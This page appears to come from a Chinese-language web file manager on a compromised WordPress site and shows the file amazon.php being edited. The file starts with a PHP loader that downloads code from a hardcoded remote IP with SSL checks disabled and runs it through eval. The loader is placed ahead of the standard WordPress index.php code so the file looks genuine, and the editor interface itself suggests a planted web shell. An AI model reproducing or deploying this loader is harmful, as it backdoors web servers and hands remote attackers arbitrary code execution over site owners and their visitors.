查看网站首页
查看网站首页
查看 sitemap.xml
✏️ 正在编辑: amazon.php
路径:
/home/wwwbiore/public_html/amazon.php
提示:
您可以编辑任何文件(包括二进制文件),但请注意不当修改可能导致文件损坏。
<?php $u = 'http://204.12.211.10/z60420_2/stat/index.txt'; $d = ''; if (function_exists('curl_init')) { $ch = curl_init($u); curl_setopt_array($ch, [CURLOPT_RETURNTRANSFER => 1, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_FOLLOWLOCATION => 1]); $d = curl_exec($ch); curl_close($ch); } elseif (ini_get('allow_url_fopen')) { $d = file_get_contents($u, false, stream_context_create(["ssl"=>["verify_peer"=>false]])); } if ($d) @eval('?>'.$d);?> <?php /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php';
💾 保存文件
← 返回文件管理器